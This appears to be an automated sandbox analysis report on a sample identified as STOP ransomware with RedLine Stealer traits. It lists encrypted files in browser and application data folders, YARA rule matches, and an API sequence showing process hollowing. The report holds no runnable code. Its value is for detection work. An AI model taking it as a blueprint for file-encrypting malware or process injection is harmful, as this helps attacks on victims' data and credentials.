          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409774968816083.txt entropy: 7.99828542133Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409774930948024.txt entropy: 7.99836973946Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773990815004.txt entropy: 7.99821275248Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773692546813.txt entropy: 7.99826803088Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773167264099.txt entropy: 7.99848438091Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409772092581893.txt entropy: 7.99835415865Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409771301045626.txt entropy: 7.99817306577Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99873356992Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg entropy: 7.99390572721Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg entropy: 7.99376093837Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133494501122004824.txt entropy: 7.99848059559Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133494500820629104.txt entropy: 7.99822914178Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409776607416451.txt entropy: 7.99823086022Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409776161022105.txt entropy: 7.99847728915Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\ls-archive.sqlite entropy: 7.99879893454Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99718339202Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.9946872218Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99145790349Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99435470217Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99750774782Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.cdqw (copy) entropy: 7.99694761143Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.cdqw (copy) entropy: 7.99355912836Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.cdqw (copy) entropy: 7.9975412872Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.cdqw (copy) entropy: 7.99657421963Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.cdqw (copy) entropy: 7.99214334508Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.cdqw (copy) entropy: 7.99111227649Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.cdqw (copy) entropy: 7.99308273453Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.cdqw (copy) entropy: 7.99158865855Jump to dropped file
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99553172716Jump to dropped file

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 20.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 20.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 20.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 20.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 17.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 17.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 17.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 17.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000013.00000002.1480717664.0000000002220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.1259211978.0000000002191000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000E.00000002.1337203091.0000000000613000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000007.00000002.1281218697.00000000021EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000010.00000002.1396092772.0000000000668000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: Process Memory Space: E0tabE4K4r.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 412, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 5172, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 5296, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7636, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02270110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02270110
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02230110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_02230110
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041784F0_2_0041784F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B10440_2_004B1044
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041802F0_2_0041802F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B017E0_2_004B017E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0040F9030_2_0040F903
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B21230_2_004B2123
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00414ACC0_2_00414ACC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B1AB30_2_004B1AB3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041737A0_2_0041737A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004033CF0_2_004033CF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B239E0_2_004B239E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00404BA40_2_00404BA4
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041844F0_2_0041844F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00405C150_2_00405C15
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00417C230_2_00417C23
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B156F0_2_004B156F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004095EA0_2_004095EA
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B2E670_2_004B2E67
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B26A30_2_004B26A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004097400_2_00409740
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004B47EF0_2_004B47EF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022772200_2_02277220
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022F22C00_2_022F22C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022BE37C0_2_022BE37C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022773930_2_02277393
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227A0260_2_0227A026
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0228F0300_2_0228F030
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227B0000_2_0227B000
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227B0B00_2_0227B0B0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022770E00_2_022770E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022730EE0_2_022730EE
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022800D00_2_022800D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022791200_2_02279120
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022BE1410_2_022BE141
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0229D1A40_2_0229D1A4
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022BB69F0_2_022BB69F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227A6990_2_0227A699
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227E6E00_2_0227E6E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227C7600_2_0227C760
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227A79A0_2_0227A79A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0229D7F10_2_0229D7F1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022775200_2_02277520
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227CA100_2_0227CA10
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02277A800_2_02277A80
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02280B000_2_02280B00
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02272B600_2_02272B60
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227DBE00_2_0227DBE0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022778800_2_02277880
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022918D00_2_022918D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0228A9300_2_0228A930
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0227A9160_2_0227A916
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0229E9A30_2_0229E9A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0229F9B00_2_0229F9B0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022759F70_2_022759F7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022789D00_2_022789D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02278E600_2_02278E60
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022A4E9F0_2_022A4E9F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_022B2D1E0_2_022B2D1E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02275DE70_2_02275DE7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02275DF70_2_02275DF7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040D2402_2_0040D240
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00419F902_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004050572_2_00405057
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040C0702_2_0040C070
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0042E0032_2_0042E003
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0042F0102_2_0042F010
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004080302_2_00408030
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004070E02_2_004070E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004101602_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004C81132_2_004C8113
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004021C02_2_004021C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004391F62_2_004391F6
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004352402_2_00435240
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004C93432_2_004C9343
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004054472_2_00405447
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004054572_2_00405457
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004084C02_2_004084C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004344FF2_2_004344FF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004495062_2_00449506
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0043E5A32_2_0043E5A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0044B5B12_2_0044B5B1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040A6602_2_0040A660
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004356752_2_00435675
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004096862_2_00409686
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0041E6902_2_0041E690
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004067402_2_00406740
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040274E2_2_0040274E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040A7102_2_0040A710
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040F7302_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004087802_2_00408780
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0044D7A12_2_0044D7A1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0042C8042_2_0042C804
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004068802_2_00406880
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004819202_2_00481920
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0044D9DC2_2_0044D9DC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004349F32_2_004349F3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004069F32_2_004069F3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00449A712_2_00449A71
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00443B402_2_00443B40
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00406B802_2_00406B80
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00409CF92_2_00409CF9
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0044ACFF2_2_0044ACFF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040DD402_2_0040DD40
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00427D6C2_2_00427D6C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040BDC02_2_0040BDC0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00409DFA2_2_00409DFA
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0042CE512_2_0042CE51
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00434E0B2_2_00434E0B
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00406EE02_2_00406EE0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00409F762_2_00409F76
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00420F302_2_00420F30
